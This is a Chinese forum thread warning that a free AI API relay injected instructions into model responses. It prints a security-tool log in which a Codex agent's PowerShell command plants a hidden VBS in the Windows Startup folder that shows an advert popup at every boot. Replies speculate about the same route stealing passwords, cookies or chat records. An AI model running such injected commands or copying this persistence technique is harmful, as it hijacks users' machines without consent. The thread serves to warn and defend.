继续公益站投毒一说

搞七捻三搞七捻三, Lv1转载避雷
查看原帖
yudisama
yudisama 楼主
#1

此人早有征兆

时间应该是早于 星期二

496569d517a8348ba32e4dc557362b50

ce4de5f000f627dd893bc4604fc74126
ce4de5f000f627dd893bc4604fc74126910×162 9.58 KB

ea8201dd3f7ad0569d48fbb232406369

ffcecb030ea39a6891e2a56adb5c4765
ffcecb030ea39a6891e2a56adb5c4765538×656 45.6 KB

60fba2f4000b0bdc2077393ce3d14d7f
60fba2f4000b0bdc2077393ce3d14d7f887×301 57.9 KB

那个时候被喷了,改了 换成返回体那种了,可以过滤

后面就是 进群的有key 用 , 流出去的sk_free 打广告

直到今天 5.21 逆天的来了

adf5607b3eac76fd8e8efd2842aee74d
adf5607b3eac76fd8e8efd2842aee74d2233×1910 253 KB

1d5a167c3ebe2181baeff854a20c2efe
1d5a167c3ebe2181baeff854a20c2efe2190×1752 68.3 KB

日志

防護項目:啟動目錄(擴展保護)
目標檔案:C:\Users\Leo Hsu\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\我们拥有的信仰.vbs
操作結果:已阻止
行程ID:54536
操作行程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作行程命令列:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command “[Console]::OutputEncoding=[System.Text.Encoding]::UTF8;
$ErrorActionPreference=‘Stop’
$startup = [Environment]::GetFolderPath(‘Startup’)
$name = ‘我们拥有的信仰’
$b64 = ‘5YWs55uKdG9rZW4y6YCa55+l576kMTEwNDEzODg2MyDluIzmnJvkurrkurp0b2tlbuiHqueUsQ==’
$ps1 = Join-Path $env:APPDATA ‘faith_popup.ps1’
$vbs = Join-Path $startup ($name + ‘.vbs’)
$psContent = @”
`$b64 = ‘$b64’
`$msg = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$b64))
Add-Type -AssemblyName PresentationFramework
[void][System.Windows.MessageBox]::Show(`$msg, ‘$name’)
“@
Set-Content -LiteralPath $ps1 -Value $psContent -Encoding UTF8
$vbsContent = @”
Set WshShell = CreateObject(“WScript.Shell”)
WshShell.Run “powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File “”$ps1"”", 0, False
"@
Set-Content -LiteralPath $vbs -Value $vbsContent -Encoding ASCII
Write-Output “Created startup popup: $vbs”
Write-Output “Script: $ps1”
Write-Output "Decoded pr
父行程ID:38080
父行程:C:\Program Files\WindowsApps\OpenAI.Codex_26.513.4821.0_x64__2p2nqsd0c76g0\app\resources\codex.exe
父行程命令列:“C:\Program Files\WindowsApps\OpenAI.Codex_26.513.4821.0_x64__2p2nqsd0c76g0\app\resources\codex.exe” app-server --analytics-default-enabled

最气不过的还有那群添他的

image

(发不了图了,不知道啥意思)

免费的还要求这 要求那

没不要过度反应,开机启动弹窗的产品多了去了

群主的大恩大德我将铭记在心,将来等我靠AI走上人生巅峰一定会不忘记群主今日的恩情

给你用都不错了

免费的还挑上刺了

:heart:13:laughing:1
wangdabao哪个公益站啊
pandj是哪家啊..害怕
SKT.Shinyruo到底是谁啊
TOPIC OWNER
链接 ↺ 回复
32楼层
31回复
26用户
yudisama Maru_sec vanderwaals baoguo_ma
Maru_sec
Maru_sec
#2

问题是这广告出现的方式不太河狸ovo…

如果是中转站ui到处挂广告我倒是还能接受…

:heart:4
1个回复
lihonglin
lihonglin

没错 出现广告的方式我宁愿放在ui界面上跟之前挂一堆传奇一样
但是这种方式出现了 这以后还得防范响应体 玩意挂个聊天记录回传或者说本地微信图片记录(更偏隐私之类的)回传的脚本 这不完蛋蛋了

↓ 跳到帖子
AppleWish
#3

有点担心了,这是哪个公益站,害怕

:heart:4
1个回复
yudisama
yudisama 楼主

跑路咯, 已经被喷的体无完肤,所以我不说了,只能是说长点心

:heart:2
TOPIC OWNER
↓ 跳到帖子
huanyi
#4

这是哪个公益站啊?自动注入其他脚本还是有点恐怖啊

:heart:3
vanderwaals
vanderwaals
#5

既然都能通过指令来添加开机广告了, 那我把指令改成备份下浏览器的书签数据密码什么的, 然后上传到xxx, 也不难了吧

:heart:2
1个回复
yudisama
yudisama 楼主

包的啊,这种太狠了,提示词注入, 计算机安全问题啊

:heart:1
TOPIC OWNER
↓ 跳到帖子
yudisama
yudisama 楼主 ↶ @vanderwaals
#6

包的啊,这种太狠了,提示词注入, 计算机安全问题啊

:heart:1
TOPIC OWNER
baoguo_ma
baoguo_ma
#7

这种真实毒瘤啊、毫无底线、要么就好好做公益、要么就不做、直接投毒是人品真的差

:heart:4
behappy
#8

看到这玩意估计都会血压飙升突然吓一跳吧。。。。

Aerxz
Aerxz
#9

6现在的公益站,简直裸奔啊。都出来恶心人了

:heart:1
lihonglin
lihonglin ↶ @Maru_sec
#10

没错 出现广告的方式我宁愿放在ui界面上跟之前挂一堆传奇一样
但是这种方式出现了 这以后还得防范响应体 玩意挂个聊天记录回传或者说本地微信图片记录(更偏隐私之类的)回传的脚本 这不完蛋蛋了

leowyzhang
leowyzhang
#11

1、可以不提供白嫖
2、可以限速
3、可以限量
4、也可以网站上挂广告
总之方式有很多种,可是偏偏选择这种;
不知道那些付费的客户是否会担心,毕竟这种事情只有0次和无数次

:heart:1
hwang
hwang
#12

广告可以,但是这已经远远超出广告的定位了。今天可以脚本弹广告,明天就可以插木马病毒,这个形式也没差多少了

:heart:1
woofee确实是新的病毒传播途径
yudisama
yudisama 楼主 ↶ @AppleWish
#13

跑路咯, 已经被喷的体无完肤,所以我不说了,只能是说长点心

:heart:2
TOPIC OWNER
miujy
miujy
#15

哪个公益站,这种带病毒的公益站发出来让大家避避雷。

:heart:1
buzouxialu
buzouxialu
#16

这种行为跟违法已经没什么区别了吧,现在只是打打广告,以后植入一些恶意代码恶意语句完全不在话下

EricZh
EricZh
#17

可怕,哪个公益站,发出来让大家避避雷

teacher
teacher
#18

我说我用cc的时候怎么老是提醒有恶意指令

1个回复
cmpdke33
cmpdke33

怎么做到提醒恶意指令的?要装什么Skills吗?这个功能对于我经常用yolo模式来说太重要了

↓ 跳到帖子
cmpdke33
cmpdke33 ↶ @teacher
#19

怎么做到提醒恶意指令的?要装什么Skills吗?这个功能对于我经常用yolo模式来说太重要了

1个回复
teacher
teacher

没有装,他自己有时候会识别到,我看他输出此项目并非恶意代码。投毒好像是让模型拒绝修改我的代码,所以你问什么他也不会最终执行。

↓ 跳到帖子
lzc1
lzc1
#21

看到这句话血压已经升高了 :sweat_smile:

mjjss
#22

佬友 群号漏了 码一下。 小白真是太难了,中转掺水看不出,还有投毒的,我想可能人人以后都要搭号池了

:heart:1
SamZhao92
SamZhao92 ↶ @SamZhao92
#23

ScreenShot2026-05-21165434987
ScreenShot2026-05-21165434987471×326 6.03 KB

准备要跑了

:laughing:2
1个回复
cmpdke33
cmpdke33

这群主还敢说什么自由主义…在它眼里的自由主义该不会是无政府主义吧,想干啥就干啥…

真正的自由是不妨碍其他人为前提的…

就怕他到时候秽土转生成其他公益站/商业站然后边黑用户电脑边卖对话数据,还卖token,一鱼三吃

:heart:1
↓ 跳到帖子
dfeiwej
dfeiwej
#24

到底是哪个中转站呢?确实用起来很怕呀

:heart:2
teacher
teacher ↶ @cmpdke33
#25

没有装,他自己有时候会识别到,我看他输出此项目并非恶意代码。投毒好像是让模型拒绝修改我的代码,所以你问什么他也不会最终执行。

cmpdke33
cmpdke33 ↶ @SamZhao92
#26

这群主还敢说什么自由主义…在它眼里的自由主义该不会是无政府主义吧,想干啥就干啥…

真正的自由是不妨碍其他人为前提的…

就怕他到时候秽土转生成其他公益站/商业站然后边黑用户电脑边卖对话数据,还卖token,一鱼三吃

:heart:1
1个回复
SamZhao92
SamZhao92

在那个群潜水也不短了,怎么说呢,感觉里面的发言和氛围,挺难绷的

Wanghc233为了free啥人都能被附庸
↓ 跳到帖子
SamZhao92
SamZhao92 ↶ @cmpdke33
#27

在那个群潜水也不短了,怎么说呢,感觉里面的发言和氛围,挺难绷的

Wanghc233为了free啥人都能被附庸
choovybi
choovybi
#28

要是卖数据去训练模型倒也算了,那种大家都心知肚明,但这种太危险了,妥妥的黑客行为啊…而且看群主那个说法,真离谱了,建议爆出名字让大家避雷

zljbjh
#29

这已经超出底线了,中转站这样玩,离死不远了

RyanVan
RyanVan
#30

今天敢给你系统偷偷写入广告,明天敢干什么我都不敢想

:+1:1
Crystalbyl支持校长啊,今天吓死我了
JieRu
#31

太吓人了,都不敢用了,这种有什么办法可以防啊?每次提示词都加一些内容,不让他干坏事?

chriswilson
chriswilson
#32

真的纯没底线啊,这谁敢用啊。回头给你注入一点命令,扫文件/cookie上传还得了